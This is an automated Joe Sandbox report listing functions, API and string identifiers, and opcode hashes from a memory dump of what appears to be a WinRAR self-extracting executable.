                                                                                          • Instruction Fuzzy Hash: AE911C62B1C69296FB11CF29D4813ED2761FBA6788F441131EE4E87B49EE39E646C300
                                                                                          Function 00007FF6373AB534 Relevance: .2, Instructions: 181COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                          • Instruction ID: 58056d3e5801a77beda9481714a07cf4f80d7ec5ec8f4d843a1a06053036923f
                                                                                          • Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                          • Instruction Fuzzy Hash: B1610F62B2C1D549FF41CF7585114FD7BA1AB09784B8A8032CE9AA7B46CE3DE506EF10
                                                                                          Function 00007FF6373B21D0 Relevance: .1, Instructions: 137COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                          • Instruction ID: 5c082522cbb7187ca5348eb7431e8e98f221b8f434a6af8d08e91aea924e9f5d
                                                                                          • Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                          • Instruction Fuzzy Hash: EB510073B1C5614BF7698F28D004BAD3751FB84B48F444234DA498B788CE3EE945EB40
                                                                                          Function 00007FF6373B2AB0 Relevance: .1, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                          • Instruction ID: 92089a2f0d8bd2bdc27beae8cded34e7c5cd36cad2f25377caf71182814954de
                                                                                          • Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                          • Instruction Fuzzy Hash: 2231E3B2A1C9818BEB48CF5AD59127E7B90F744380F048139DB4AC7B81DE3CE055D740
                                                                                          Function 00007FF6373D58E0 Relevance: .0, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                                          • Instruction ID: 659b39269c23ce31eef8fe2d3bace8efd653e6675287db7d84f6f3f1880330ca
                                                                                          • Opcode Fuzzy Hash: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                                          • Instruction Fuzzy Hash: B1F03672B1C7958BEBA4CF2DA842A2977D1F7483C4F948039D68DC3B14DA3C94659F04
                                                                                          Function 00007FF6373C3354 Relevance: .0, Instructions: 2COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                                          • Instruction ID: 2f6f5d32b025d89d9ebd67965bc969715d8092926abd073d3f534fefa5446cd8
                                                                                          • Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                                          • Instruction Fuzzy Hash: 01A0016590C852D0F6458B14E9A00B02220FB55301B500031E00D822A4DF7EB401A606
                                                                                          Function 00007FF63739D7D0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                                          • API String ID: 3668304517-727060406
                                                                                          • Opcode ID: 9722f19d9730c17eaeca2eefbf6c05556aeae8c55d78850e8e2a1aeae63cce70
                                                                                          • Instruction ID: d11fe8a6c5064e8250dc5b433ae08e5273c4201f750a3b63580daea4db6af16a
                                                                                          • Opcode Fuzzy Hash: 9722f19d9730c17eaeca2eefbf6c05556aeae8c55d78850e8e2a1aeae63cce70
                                                                                          • Instruction Fuzzy Hash: 6641F436B1AF01D9FB009B65E8803E933A5EF18798F400136DA4C93B69EF38E555E344
                                                                                          Function 00007FF6373C2A10 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                          • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                          • API String ID: 2565136772-3242537097
                                                                                          • Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                          • Instruction ID: 38a49db934525a0ba03b1ed8069791904715ba422b2d6b74332db622973f6879
                                                                                          • Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                          • Instruction Fuzzy Hash: 7221F864E1DA1382FE599B61E8551B423A0EF48B91F480035D90EC27B0EF7CF899B704
                                                                                          Function 00007FF6373A6A0C Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                          • String ID: DXGIDebug.dll$UNC$\\?\
                                                                                          • API String ID: 4097890229-4048004291
                                                                                          • Opcode ID: fb1ac769355281392679e6cccb69878fe575312718547a0a82cc4cd56cbd4b61
                                                                                          • Instruction ID: 47e576337bbd980e3d7edecf9bb65d1e7ba2f8b74b6068fa6dd2be9789d7e016
                                                                                          • Opcode Fuzzy Hash: fb1ac769355281392679e6cccb69878fe575312718547a0a82cc4cd56cbd4b61
                                                                                          • Instruction Fuzzy Hash: 2112CA22B0DA4280FF10DB65E4852AD6372EB92B88F504235DB9D87BE9DF3DE549D340
                                                                                          Function 00007FF6373BA440 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                          • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                          • API String ID: 431506467-1315819833
                                                                                          • Opcode ID: 492748e4b920a0caf0e9a60e4b7f93ee9a00f1d6e92b46c97eb4ea70364b9bd5
                                                                                          • Instruction ID: 0c26075398a43ea0a95d038fef6314f84c6ae51a3ec1d06b5b3f617fd62817af
                                                                                          • Opcode Fuzzy Hash: 492748e4b920a0caf0e9a60e4b7f93ee9a00f1d6e92b46c97eb4ea70364b9bd5
                                                                                          • Instruction Fuzzy Hash: 0AB1ADA2F1DB8685FB009BA4D4852AC2372EF89398F404235DE5CA6BD9DE3CE545E344
                                                                                          Function 00007FF6373B6E80 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 204memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                                                                          • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                          • API String ID: 2868844859-1533471033
                                                                                          • Opcode ID: b0a568968ba406e2562f5405558042a856f124114ebc2f236df8f8f8fbeda86d
                                                                                          • Instruction ID: 9ea9d192ff3930877faf59d9706a5be7145edcdf9bbf7ad8bec21b9ae926bc30
                                                                                          • Opcode Fuzzy Hash: b0a568968ba406e2562f5405558042a856f124114ebc2f236df8f8f8fbeda86d
                                                                                          • Instruction Fuzzy Hash: 32816B62F1DA4685FB00DBB5D8402ED2371EF49798F404136DE1D97BAAEE38E50AE344
                                                                                          Function 00007FF6373CE650 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                          • API String ID: 3215553584-2617248754
                                                                                          • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                          • Instruction ID: 934c053f943fa0ed0c517b7c22d2fd9e73dde861c00d88fe1a0c3bda9b922e47
                                                                                          • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                          • Instruction Fuzzy Hash: 7D419D72E1AB9689FB00CF25E8417A933E5EB18398F414236EE5C87B54EE3CD125D344
                                                                                          Function 00007FF6373BF390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                          • String ID: STATIC
                                                                                          • API String ID: 2845197485-1882779555
                                                                                          • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                          • Instruction ID: 8d7dade6a847d32891ae56e51b348a0eec92ae18d0424fb5a82ba33543303754
                                                                                          • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                          • Instruction Fuzzy Hash: 2931A125B0DA5386FA609B52E954BBA23A2FF89BC0F445430DD4D87B96DF3CF406A740
                                                                                          Function 00007FF6373BAE90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemTextWindow
                                                                                          • String ID: LICENSEDLG
                                                                                          • API String ID: 2478532303-2177901306
                                                                                          • Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                          • Instruction ID: 20e749902dd81874f5ca1a5de5a76b6f9eba89b79f7a3258affcd670e0195ff7
                                                                                          • Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                          • Instruction Fuzzy Hash: 67418A26E0DE5682FB548B56E8547B927A1EF84FC0F444036D90E87BA4CF3DF946A700
                                                                                          Function 00007FF6373AB9B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                          • API String ID: 2915667086-2207617598
                                                                                          • Opcode ID: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                                          • Instruction ID: 4292a229850d41bf25f42d80ccea8c53ef7dc7de0847803a0a67e90e778fe4b9
                                                                                          • Opcode Fuzzy Hash: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                                          • Instruction Fuzzy Hash: E8317520E1DB0380FE968B16A85527923A1FF5ABD0F484139C80EC33A4EF3CE945B704
                                                                                          Function 00007FF6373B87D8 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID: $
                                                                                          • API String ID: 3668304517-227171996
                                                                                          • Opcode ID: 23d63e10c4511c2d18e00504b5dad66297b05e15860e9ed8e5673f5f7533ff79
                                                                                          • Instruction ID: 350472a3fcdb2eeabd413651b8395678564ed7672ab3b9d732da234623e7a9bf
                                                                                          • Opcode Fuzzy Hash: 23d63e10c4511c2d18e00504b5dad66297b05e15860e9ed8e5673f5f7533ff79
                                                                                          • Instruction Fuzzy Hash: FCF1BEA2F1DB4680FE009B69D4841FC6362EB54BA8F905635CA6D977E5DF7CF180A380
                                                                                          Function 00007FF6373C57EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                          • String ID: csm$csm$csm
                                                                                          • API String ID: 2940173790-393685449
